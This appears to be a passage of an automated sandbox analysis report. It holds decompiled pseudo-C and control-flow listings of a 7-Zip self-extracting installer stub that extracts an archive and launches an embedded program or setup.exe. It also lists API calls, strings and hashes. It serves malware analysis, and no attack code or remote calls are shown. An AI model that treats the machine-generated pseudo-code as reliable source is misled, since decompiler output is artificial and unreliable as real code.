401a18 call 40587c call 403a9c 203->211 212 401787-4017f9 call 401ce1 call 405d0b call 401c80 call 401e56 call 403a9c * 2 call 401c80 call 401e56 call 403a9c 203->212 211->212 278 40176d-401770 211->278 324 401811-401891 call 402634 call 401a18 call 403a9c CreateProcessA 212->324 325 4017fb-40180c call 401db8 call 401de3 212->325 222->223 245 4016e6-4016e9 223->245 246 40170d-401727 call 403a9c * 2 223->246 235->236 242 4012f4-4012f7 236->242 243 40139d-4014ac call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 401d7a call 403a9c * 2 call 401c80 call 404073 call 402634 call 401d7a call 403a9c * 6 call 4042d6 call 4042ad 236->243 242->243 251 4012fd-40130f MessageBoxW 242->251 243->62 253 4016f7-401708 call 403a9c * 2 245->253 254 4016eb-4016f2 call 411093 245->254 281 40195a-40195e 246->281 251->243 259 401315-401330 call 403a9c * 3 251->259 287 4018ae 253->287 254->253 259->91 279 401776-401782 call 411093 278->279 280 4018af-4018b4 SetCurrentDirectoryA 278->280 279->280 280->166 289 401960-40196e WaitForSingleObject CloseHandle 281->289 290 401974-40197c SetCurrentDirectoryA call 403a9c 281->290 287->280 289->290 303 401981-401990 call 403a9c 290->303 303->94 317 401992-401994 303->317 317->94 342 401897-40189a 324->342 343 40193a-401955 CloseHandle call 403a9c 324->343 325->324 345 4018a3-4018a9 call 403a9c 342->345 346 40189c-40189e call 411127 342->346 343->281 345->287 346->345
                              C-Code - Quality: 90%
                              			E00401014(void* __eflags, void* _a4, signed int _a7) {
				signed int _v5;
				char _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				char _v32;
				struct HWND__* _v36;
				signed int _v40;
				signed int _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				char _v56;
				WCHAR* _v68;
				struct HWND__* _v72;
				struct HWND__* _v76;
				char _v80;
				struct HWND__* _v84;
				struct HWND__* _v88;
				char _v92;
				struct HWND__* _v96;
				struct HWND__* _v100;
				char _v104;
				struct HWND__* _v108;
				struct HWND__* _v112;
				char _v116;
				CHAR* _v128;
				CHAR* _v140;
				char _v144;
				struct HWND__* _v148;
				struct HWND__* _v152;
				char _v156;
				intOrPtr _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v216;
				CHAR* _v228;
				struct _PROCESS_INFORMATION _v244;
				struct _STARTUPINFOA _v312;
				void* __ebp;
				char _t280;
				intOrPtr* _t294;
				void* _t297;
				void* _t302;
				signed int _t306;
				signed int _t308;
				signed int _t314;
				signed int _t318;
				signed int _t339;
				void* _t375;
				signed char _t384;
				signed int _t423;
				signed int _t436;
				int _t466;
				intOrPtr _t501;
				void* _t619;
				void* _t620;
				void* _t635;
				signed int _t636;
				signed int _t640;
				signed int _t642;
				void* _t643;
				char** _t644;

				 *0x423144 = _a4;
				_t280 = E00401A51();
				_t635 = 3;
				 *0x423148 = _t280;
				_v156 = 0;
				_v152 = 0;
				_v148 = 0;
				E00402170( &_v156, _t635);
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				E00402170( &_v32, _t635);
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				E00402170( &_v80, _t635);
				_v116 = 0;
				_v112 = 0;
				_v108 = 0;
				E00402170( &_v116, _t635);
				E00401C80( &_v68, GetCommandLineW());
				_push( &_v32);
				E004038EE( &_v68,  &_v156);
				E00403A9C(_v68);
				_v104 = 0;
				_v100 = 0;
				_v96 = 0;
				E00402170( &_v104, _t635);
				_t501 =  *0x423144; // 0x400000
				E004045E2(_t501,  &_v104);
				E0040235E( &_v32);
				E00402323( &_v32);
				_a7 = 0;
				_t294 = E00401C80( &_v68, L"-y");
				E00401E3A( &_v32,  &_v20, 2);
				_t297 = E00403B4F( *_t294);
				E00403A9C(_v20);
				E00403A9C(_v68);
				_t649 = _t297;
				if(_t297 == 0) {
					_a7 = 1;
					E00401D7A( &_v32, E00401E19( &_v32,  &_v20, 2));
					E00403A9C(_v20);
					E0040235E( &_v32);
					E00402323( &_v32);
				}
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				E0040243E( &_v92, _t635);
				_push( &_v92);
				_push(";!@InstallEnd@!");
				_t302 = E00401AF4(_v104, ";!@Install@!UTF-8!", _t649); // executed
				if(_t302 != 0) {
					E00401C80( &_v212, L".\\");
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					E00402170( &_v56, _t635);
					__eflags = _v88;
					_v216 = 1;
					if(_v88 == 0) {
						L21:
						_v144 = 0;
						E00401ECD( &_v140);
						_t306 = E00405298( &_v144, _t643,  *0x420060);
						__eflags = _t306;
						if(_t306 != 0) {
							_push(0x1c);
							_t640 = E00403A76();
							__eflags = _t640;
							if(_t640 == 0) {
								_t636 = 0;
								__eflags = 0;
							} else {
								_t139 = _t640 + 8; // 0x8
								 *((intOrPtr*)(_t640 + 4)) = 0;
								E00401F0D(_t139);
								 *_t640 = 0x41b328;
								_t636 = _t640;
							}
							__eflags = _t636;
							if(_t636 != 0) {
								 *((intOrPtr*)( *_t636 + 4))(_t636);
							}
							_t308 = E00408107(_t636);
							__eflags = _t308;
							if(_t308 == 0) {
								E00401A03();
								_v5 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								E00402170( &_v44, 3);
								_push( &_v44);
								_push( &_v5);
								_push(_v216);
								_push( &_v200); // executed
								_t314 = E00402F15(_t636,  &_v104, __eflags); // executed
								__eflags = _t314;
								if(_t314 == 0) {
									E00403A9C(_v44);
									E00401ECD( &_v128);
									E00405033( &_v128);
									_t318 = SetCurrentDirectoryA(_v140); // executed
									__eflags = _t318;
									if(_t318 != 0) {
										__eflags = _v76;
										if(_v76 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												L57:
												E00401CE1( &_v68,  &_v200);
												E00405D0B( &_v68);
												E00401C80( &_v20, L"%%T\\");
												E00401E56( &_v56,  &_v20,  &_v68);
												E00403A9C(_v20);
												E00403A9C(_v68);
												E00401C80( &_v20, L"%%T");
												E00401E56( &_v56,  &_v20,  &_v200);
												E00403A9C(_v20);
												__eflags = _v28;
												if(_v28 != 0) {
													E00401DB8( &_v56, 0x20);
													E00401DE3( &_v56,  &_v32);
												}
												_push( &_v56);
												_v312.cb = 0x44;
												_v312.lpReserved = 0;
												_v312.lpDesktop.cbSize = 0;
												_v312.lpTitle = 0;
												_v312.dwFlags = 0;
												_v312.cbReserved2 = 0;
												_v312.lpReserved2 = 0;
												E00402634( &_v188,  &_v212);
												E00401A18();
												E00403A9C(_v188);
												_t339 = CreateProcessA(0, _v228, 0, 0, 0, 0, 0, 0,  &_v312,  &_v244); // executed
												__eflags = _t339;
												if(_t339 != 0) {
													CloseHandle(_v244.hThread);
													_a4 = _v244.hProcess;
													E00403A9C(_v228);
													L69:
													__eflags = _a4;
													if(_a4 != 0) {
														WaitForSingleObject(_a4, 0xffffffff);
														CloseHandle(_a4);
													}
													SetCurrentDirectoryA(_v128); // executed
													E00403A9C(_v128);
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													goto L73;
												} else {
													__eflags = _a7;
													if(_a7 == 0) {
														__eflags = 0;
														E00411127(0);
													}
													E00403A9C(_v228);
													L63:
													L64:
													SetCurrentDirectoryA(_v128);
													_push(_v128);
													L65:
													E00403A9C();
													E00403A9C(_v200);
													__eflags = _t636;
													if(_t636 != 0) {
														 *((intOrPtr*)( *_t636 + 8))(_t636);
													}
													E00401A2D( &_v144);
													E00403A9C(_v140);
													E00403A9C(_v56);
													E00403A9C(_v212);
													E00403A9C(_v92);
													E00403A9C(_v104);
													E00403A9C(_v116);
													E00403A9C(_v80);
													E00403A9C(_v32);
													E00403A9C(_v156);
													_t375 = 1;
													return _t375;
												}
											}
											E00401D1B( &_v56, L"setup.exe");
											_t384 = E0040587C( *((intOrPtr*)(E00401A18())),  &_v56, __eflags);
											asm("sbb al, al");
											_v5 =  ~_t384 + 1;
											E00403A9C(_v188);
											__eflags = _v5;
											if(_v5 == 0) {
												goto L57;
											}
											__eflags = _a7;
											if(_a7 == 0) {
												E00411093(0, L"Can not find setup.exe");
											}
											goto L64;
										}
										E00401A18();
										__eflags = _v28;
										_v312.lpDesktop.cbSize = 0x3c;
										_v312.lpTitle = 0x140;
										_v312.dwX = 0;
										_v312.dwY = 0;
										_v312.dwXSize = _v68;
										if(_v28 != 0) {
											E00401DE3( &_v116,  &_v32);
										}
										E00401A18();
										_v312.dwXCountChars = 0;
										asm("sbb eax, eax");
										_v312.dwYCountChars = 1;
										_v312.hStdError = 0;
										_v312.dwYSize =  ~_v40 & _v44;
										ShellExecuteExA( &(_v312.lpDesktop));
										__eflags = _v312.dwFillAttribute - 0x20;
										if(_v312.dwFillAttribute > 0x20) {
											_a4 = _v312.hStdError;
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L69;
										} else {
											__eflags = _a7;
											if(_a7 == 0) {
												__eflags = 0;
												E00411093(0, L"Can not open file");
											}
											E00403A9C(_v44);
											E00403A9C(_v68);
											goto L63;
										}
									}
									SetCurrentDirectoryA(_v128);
									E00403A9C(_v128);
									E00403A9C(_v200);
									goto L43;
								}
								__eflags = _a7;
								if(_a7 != 0) {
									L40:
									_push(_v44);
									goto L65;
								}
								__eflags = _t314 - 1;
								if(_t314 == 1) {
									L36:
									_t619 = 8;
									E00401D7A( &_v44, E0040602F(_t619));
									E00403A9C(_v188);
									_t314 = 0x80004005;
									L37:
									__eflags = _t314 - 0x80004004;
									if(_t314 != 0x80004004) {
										__eflags = _v40;
										if(_v40 != 0) {
											_t620 = 7;
											MessageBoxW(0, _v44,  *(E0040602F(_t620)), 0x10);
											E00403A9C(_v188);
										}
									}
									goto L40;
								}
								__eflags = _v5;
								if(_v5 == 0) {
									goto L37;
								}
								goto L36;
							} else {
								E00411093(0, L"Can not load codecs");
								L43:
								__eflags = _t636;
								if(_t636 != 0) {
									 *((intOrPtr*)( *_t636 + 8))(_t636);
								}
								L24:
								_push(1);
								_pop(0);
								L73:
								E00401A2D( &_v144);
								E00403A9C(_v140);
								E00403A9C(_v56);
								E00403A9C(_v212);
								_t644 =  &(_t644[3]);
								goto L74;
							}
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = 0;
							E00411093(0, L"Can not create temp folder archive");
						}
						goto L24;
					}
					E00402155( &_v176);
					_v176 = 0x41b334;
					_t423 = E00403D5A( &_v92,  &_v176);
					__eflags = _t423;
					if(_t423 != 0) {
						E00401C80( &_v20, L"Title");
						E00404073( &_v68,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"BeginPrompt";
						E00401C80( &_v20);
						E00404073( &_v44,  &_v176,  &_v20);
						E00403A9C(_v20);
						 *_t644 = L"Progress";
						E00401C80( &_v20);
						E00404073( &_v228,  &_v176,  &_v20);
						E00403A9C(_v20);
						_t436 = E00403B4F(L"no");
						__eflags = _t436;
						if(_t436 == 0) {
							_v216 = 0;
						}
						E00401C80( &_v20, L"Directory");
						_t642 = E00404041( &_v176,  &_v20);
						E00403A9C(_v20);
						__eflags = _t642;
						if(_t642 >= 0) {
							__eflags =  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc;
							E00401D7A( &_v212,  *((intOrPtr*)(_v164 + _t642 * 4)) + 0xc);
						}
						__eflags = _v40;
						if(_v40 == 0) {
							L20:
							E00401C80( &_v20, L"RunProgram");
							E00401D7A( &_v56, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteFile");
							E00401D7A( &_v80, E00404073( &(_v244.hThread),  &_v176,  &_v20));
							E00403A9C(_v244.hThread);
							E00403A9C(_v20);
							E00401C80( &_v20, L"ExecuteParameters");
							_push( &_v32);
							E00401D7A( &_v116, E00402634( &(_v244.hThread), E00404073( &_v188,  &_v176,  &_v20)));
							E00403A9C(_v244.hThread);
							E00403A9C(_v188);
							E00403A9C(_v20);
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[6]);
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							goto L21;
						} else {
							__eflags = _a7;
							if(_a7 != 0) {
								goto L20;
							}
							_t466 = MessageBoxW(0, _v44, _v68, 0x24);
							__eflags = _t466 - 6;
							if(_t466 == 6) {
								goto L20;
							}
							E00403A9C(_v228);
							E00403A9C(_v44);
							E00403A9C(_v68);
							_t644 =  &(_t644[3]);
							L19:
							_v176 = 0x41b334;
							E004042D6();
							E004042AD( &_v176);
							E00403A9C(_v56);
							E00403A9C(_v212);
							E00403A9C(_v92);
							E00403A9C(_v104);
							E00403A9C(_v116);
							E00403A9C(_v80);
							E00403A9C(_v32);
							E00403A9C(_v156);
							goto L75;
						}
					}
					__eflags = _a7;
					if(_a7 == 0) {
						__eflags = 0;
						E00411093(0, L"Config failed");
					}
					_push(1);
					_pop(0);
					goto L19;
				} else {
					if(_a7 == 0) {
						E00411093(0, L"Can\'t load config info");
					}
					_push(1);
					_pop(0);
					L74:
					E00403A9C(_v92);
					E00403A9C(_v104);
					E00403A9C(_v116);
					E00403A9C(_v80);
					E00403A9C(_v32);
					E00403A9C(_v156);
					L75:
					return 0;
				}
			}


































































                              0x00401023
                              0x00401028
                              0x00401031
                              0x00401039
                              0x0040103e
                              0x00401044
                              0x0040104a
                              0x00401050
                              0x00401059
                              0x0040105c
                              0x0040105f
                              0x00401062
                              0x0040106b
                              0x0040106e
                              0x00401071
                              0x00401074
                              0x0040107d
                              0x00401080
                              0x00401083
                              0x00401086
                              0x00401095
                              0x004010a3
                              0x004010a7
                              0x004010af
                              0x004010b5
                              0x004010bc
                              0x004010bf
                              0x004010c2
                              0x004010c7
                              0x004010d0
                              0x004010d8
                              0x004010e0
                              0x004010ed
                              0x004010f0
                              0x00401100
                              0x00401109
                              0x00401113
                              0x0040111b
                              0x00401121
                              0x00401124
                              0x0040112f
                              0x0040113c
                              0x00401144
                              0x0040114d
                              0x00401155
                              0x00401155
                              0x0040115e
                              0x00401161
                              0x00401164
                              0x00401167
                              0x00401172
                              0x00401173
                              0x0040117d
                              0x00401184
                              0x004011aa
                              0x004011b3
                              0x004011b6
                              0x004011b9
                              0x004011bc
                              0x004011c1
                              0x004011c4
                              0x004011cb
                              0x004014b1
                              0x004014b7
                              0x004014bd
                              0x004014ce
                              0x004014d3
                              0x004014d5
                              0x004014f0
                              0x004014f7
                              0x004014fa
                              0x004014fc
                              0x00401513
                              0x00401513
                              0x004014fe
                              0x004014fe
                              0x00401501
                              0x00401504
                              0x00401509
                              0x0040150f
                              0x0040150f
                              0x00401515
                              0x00401517
                              0x0040151c
                              0x0040151c
                              0x00401521
                              0x00401526
                              0x00401528
                              0x00401547
                              0x00401551
                              0x00401554
                              0x00401557
                              0x0040155a
                              0x0040155d
                              0x00401568
                              0x0040156c
                              0x00401573
                              0x0040157b
                              0x0040157c
                              0x00401581
                              0x00401583
                              0x004015fc
                              0x00401605
                              0x0040160d
                              0x0040161e
                              0x00401620
                              0x00401622
                              0x00401651
                              0x00401654
                              0x0040172c
                              0x0040172f
                              0x00401787
                              0x00401791
                              0x00401799
                              0x004017a6
                              0x004017b6
                              0x004017be
                              0x004017c6
                              0x004017d5
                              0x004017e8
                              0x004017f0
                              0x004017f5
                              0x004017f9
                              0x00401800
                              0x0040180c
                              0x0040180c
                              0x0040181a
                              0x00401821
                              0x0040182b
                              0x00401831
                              0x00401837
                              0x0040183d
                              0x00401843
                              0x0040184a
                              0x00401850
                              0x0040185d
                              0x00401868
                              0x00401889
                              0x0040188f
                              0x00401891
                              0x00401940
                              0x00401952
                              0x00401955
                              0x0040195a
                              0x0040195a
                              0x0040195e
                              0x00401965
                              0x0040196e
                              0x0040196e
                              0x00401977
                              0x0040197c
                              0x00401987
                              0x0040198d
                              0x00401990
                              0x00401995
                              0x00401995
                              0x00000000
                              0x00401897
                              0x00401897
                              0x0040189a
                              0x0040189c
                              0x0040189e
                              0x0040189e
                              0x004018a9
                              0x004018ae
                              0x004018af
                              0x004018b2
                              0x004018b4
                              0x004018b7
                              0x004018b7
                              0x004018c2
                              0x004018c8
                              0x004018cb
                              0x004018d0
                              0x004018d0
                              0x004018d9
                              0x004018e4
                              0x004018ec
                              0x004018f7
                              0x004018ff
                              0x00401907
                              0x0040190f
                              0x00401917
                              0x0040191f
                              0x0040192a
                              0x00401934
                              0x00000000
                              0x00401934
                              0x00401891
                              0x00401739
                              0x0040174e
                              0x0040175b
                              0x0040175f
                              0x00401762
                              0x00401767
                              0x0040176b
                              0x00000000
                              0x00000000
                              0x0040176d
                              0x00401770
                              0x0040177d
                              0x0040177d
                              0x00000000
                              0x00401770
                              0x00401660
                              0x00401668
                              0x0040166b
                              0x00401675
                              0x0040167f
                              0x00401685
                              0x0040168b
                              0x00401691
                              0x0040169a
                              0x0040169a
                              0x004016a5
                              0x004016ad
                              0x004016b5
                              0x004016b7
                              0x004016c4
                              0x004016ca
                              0x004016d7
                              0x004016dd
                              0x004016e4
                              0x00401716
                              0x00401719
                              0x00401721
                              0x00000000
                              0x004016e6
                              0x004016e6
                              0x004016e9
                              0x004016f0
                              0x004016f2
                              0x004016f2
                              0x004016fa
                              0x00401702
                              0x00000000
                              0x00401707
                              0x004016e4
                              0x00401627
                              0x0040162c
                              0x00401637
                              0x00000000
                              0x0040163d
                              0x00401585
                              0x00401588
                              0x004015f1
                              0x004015f1
                              0x00000000
                              0x004015f1
                              0x0040158a
                              0x0040158d
                              0x00401594
                              0x0040159c
                              0x004015a6
                              0x004015b1
                              0x004015b7
                              0x004015bc
                              0x004015bc
                              0x004015c1
                              0x004015c3
                              0x004015c6
                              0x004015d0
                              0x004015df
                              0x004015eb
                              0x004015f0
                              0x004015c6
                              0x00000000
                              0x004015c1
                              0x0040158f
                              0x00401592
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040152a
                              0x00401531
                              0x0040163e
                              0x0040163e
                              0x00401640
                              0x00401649
                              0x00401649
                              0x004014e8
                              0x004014e8
                              0x004014ea
                              0x00401998
                              0x0040199e
                              0x004019a9
                              0x004019b1
                              0x004019bc
                              0x004019c1
                              0x00000000
                              0x004019c1
                              0x00401528
                              0x004014d7
                              0x004014da
                              0x004014e1
                              0x004014e3
                              0x004014e3
                              0x00000000
                              0x004014da
                              0x004011d7
                              0x004011ea
                              0x004011f0
                              0x004011f5
                              0x004011f7
                              0x0040121a
                              0x0040122c
                              0x00401234
                              0x0040123c
                              0x00401243
                              0x00401255
                              0x0040125d
                              0x00401265
                              0x0040126c
                              0x00401281
                              0x00401289
                              0x0040129a
                              0x0040129f
                              0x004012a1
                              0x004012a3
                              0x004012a3
                              0x004012b1
                              0x004012c7
                              0x004012c9
                              0x004012ce
                              0x004012d1
                              0x004012e2
                              0x004012e6
                              0x004012e6
                              0x004012eb
                              0x004012ee
                              0x0040139d
                              0x004013a5
                              0x004013c3
                              0x004013ce
                              0x004013d6
                              0x004013e5
                              0x00401403
                              0x0040140e
                              0x00401416
                              0x00401425
                              0x00401433
                              0x00401454
                              0x0040145f
                              0x0040146a
                              0x00401472
                              0x0040147d
                              0x00401485
                              0x0040148d
                              0x00401492
                              0x0040149b
                              0x004014a1
                              0x004014ac
                              0x00000000
                              0x004012f4
                              0x004012f4
                              0x004012f7
                              0x00000000
                              0x00000000
                              0x00401306
                              0x0040130c
                              0x0040130f
                              0x00000000
                              0x00000000
                              0x0040131b
                              0x00401323
                              0x0040132b
                              0x00401330
                              0x00401333
                              0x00401339
                              0x0040133f
                              0x0040134a
                              0x00401352
                              0x0040135d
                              0x00401365
                              0x0040136d
                              0x00401375
                              0x0040137d
                              0x00401385
                              0x00401390
                              0x00000000
                              0x00401395
                              0x004012ee
                              0x004011f9
                              0x004011fc
                              0x00401203
                              0x00401205
                              0x00401205
                              0x0040120a
                              0x0040120c
                              0x00000000
                              0x00401186
                              0x00401189
                              0x00401192
                              0x00401192
                              0x00401197
                              0x00401199
                              0x004019c4
                              0x004019c7
                              0x004019cf
                              0x004019d7
                              0x004019df
                              0x004019e7
                              0x004019f2
                              0x004019fa
                              0x00000000
                              0x004019fa

                              APIs
                                • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                              • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                              • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                              • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                              • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                              • API String ID: 2760820266-829806607
                              • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                              • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040AD19 Relevance: 14.2, APIs: 9, Instructions: 682COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 372 40ad19-40ad3d call 413954 call 40d7cc 377 40ad43-40ad79 call 402155 call 413310 call 40640d 372->377 378 40b2d7-40b2dc 372->378 386 40ae60-40ae97 call 40acc4 call 40b99b call 40b63c 377->386 387 40ad7f 377->387 379 40b605-40b613 378->379 402 40aeb6-40aec6 call 4042d6 386->402 403 40ae99-40aeb0 call 40b753 386->403 389 40ad82-40ad8c call 403a76 387->389 394 40ad9c 389->394 395 40ad8e-40ad9a 389->395 398 40ad9e-40ada3 394->398 395->398 400 40ada5-40ada7 398->400 401 40adab-40add6 call 403a76 398->401 400->401 410 40add8-40ade8 401->410 411 40adea 401->411 413 40aed1-40aed5 402->413 414 40aec8-40aece 402->414 403->402 412 40b071-40b087 403->412 415 40adec-40adf1 410->415 411->415 425 40b08d-40b090 412->425 426 40b4bf-40b4e1 call 40a402 412->426 416 40aed7-40aeeb call 403a76 413->416 417 40af18-40af2a 413->417 414->413 418 40adf3-40adf5 415->418 419 40adf9-40ae32 call 40640d call 40a5e4 415->419 434 40aef6 416->434 435 40aeed-40aef4 call 40b860 416->435 432 40af73-40af79 417->432 433 40af2c-40af6e call 4042ad call 4099bc DeleteCriticalSection call 403800 417->433 418->419 447 40ae34-40ae36 419->447 448 40ae3a-40ae40 419->448 431 40b093-40b0c8 425->431 444 40b4e3-40b4e9 426->444 445 40b4ec-40b4ef 426->445 460 40b0f3-40b0f9 431->460 461 40b0ca-40b0d3 431->461 440 40b05f-40b06e call 40b96f 432->440 441 40af7f-40afac call 4063bd 432->441 504 40b535-40b549 call 4042d6 call 4042ad 433->504 439 40aef8-40af0c call 40640d 434->439 435->439 468 40af13 439->468 469 40af0e-40af11 439->469 440->412 470 40afb2-40afbd 441->470 471 40b197-40b1a0 441->471 444->445 453 40b4f1-40b533 call 4042ad call 4099bc DeleteCriticalSection call 403800 445->453 454 40b54e-40b57e call 4032a8 call 404327 445->454 447->448 458 40ae42-40ae44 448->458 459 40ae48-40ae57 448->459 453->504 518 40b580-40b597 call 4039df 454->518 519 40b599-40b5b9 call 409cc8 454->519 458->459 459->389 472 40ae5d 459->472 465 40b101-40b149 call 4032a8 * 2 call 404327 * 2 460->465 466 40b0fb-40b0fd 460->466 473 40b382-40b388 461->473 474 40b0d9-40b0ea 461->474 575 40b163-40b169 465->575 576 40b14b-40b161 call 4039df 465->576 466->465 477 40af15 468->477 469->477 480 40afeb-40afef 470->480 481 40afbf-40afc3 470->481 482 40b1a2-40b1a4 471->482 483 40b1a8-40b1b1 471->483 472->386 484 40b390-40b3d7 call 4042ad call 4099bc DeleteCriticalSection call 403800 473->484 485 40b38a-40b38c 473->485 497 40b0f0 474->497 498 40b3d9-40b3e2 474->498 477->417 486 40b270-40b279 480->486 487 40aff5-40b004 call 40640d 480->487 481->480 492 40afc5-40afca 481->492 482->483 493 40b1b3-40b1b5 483->493 494 40b1b9-40b1fd call 4042ad call 4099bc DeleteCriticalSection call 403800 483->494 560 40b42c-40b442 call 4042d6 call 4042ad 484->560 485->484 502 40b281-40b2d2 call 4042ad call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 486->502 503 40b27b-40b27d 486->503 525 40b011-40b026 call 40bab0 487->525 526 40b006-40b00c call 40a0de 487->526 506 40afd0-40afdc call 40640d 492->506 507 40b202-40b20b 492->507 493->494 494->504 497->460 510 40b3e4-40b3e6 498->510 511 40b3ea-40b425 call 4042ad call 4099bc DeleteCriticalSection call 403800 498->511 502->378 503->502 567 40b603 504->567 506->525 548 40afde-40afe9 call 40a0b9 506->548 513 40b216-40b21c 507->513 514 40b20d-40b213 507->514 510->511 511->560 528 40b224-40b26b call 4042ad call 4099bc DeleteCriticalSection call 403800 513->528 529 40b21e-40b220 513->529 514->513 518->519 547 40b5bc-40b5fe call 4042ad * 2 call 4099bc call 40b845 call 40a5ac 519->547 563 40b028-40b02a 525->563 564 40b02e-40b037 525->564 526->525 528->504 529->528 547->567 548->525 560->379 563->564 573 40b039-40b03b 564->573 574 40b03f-40b048 564->574 567->379 573->574 583 40b050-40b059 574->583 584 40b04a-40b04c 574->584 586 40b33a-40b36e call 4042ad * 2 575->586 587 40b16f 575->587 576->575 583->440 583->441 584->583 586->431 627 40b374-40b379 586->627 593 40b172-40b179 587->593 599 40b2e5 593->599 600 40b17f 593->600 603 40b2e8-40b2ea 599->603 605 40b182-40b184 600->605 607 40b2f8-40b2ff 603->607 608 40b2ec-40b2f6 603->608 610 40b2e1-40b2e3 605->610 611 40b18a-40b190 605->611 614 40b310 607->614 615 40b301 607->615 613 40b31e-40b334 call 4039df 608->613 610->603 611->605 617 40b192 611->617 613->586 613->593 619 40b313-40b315 614->619 618 40b304-40b306 615->618 617->599 622 40b308-40b30e 618->622 623 40b37e-40b380 618->623 624 40b447-40b4ba call 4042ad * 3 call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 619->624 625 40b31b 619->625 622->614 622->618 623->619 624->379 625->613 627->426
                              C-Code - Quality: 90%
                              			E0040AD19(char* __ecx, void* __eflags) {
				signed int _t373;
				signed int _t382;
				intOrPtr* _t417;
				signed int _t419;
				signed int _t423;
				signed int _t429;
				signed int _t430;
				intOrPtr* _t440;
				intOrPtr* _t441;
				signed int _t453;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t471;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t490;
				signed int _t504;
				signed int _t505;
				intOrPtr _t507;
				signed int _t508;
				signed char _t510;
				char _t512;
				intOrPtr* _t513;
				signed int _t518;
				signed int _t523;
				signed int _t535;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr* _t540;
				signed int _t580;
				signed int _t581;
				intOrPtr _t589;
				signed int _t595;
				signed int _t626;
				signed int _t652;
				signed int _t653;
				char* _t658;
				signed int _t660;
				signed int _t661;
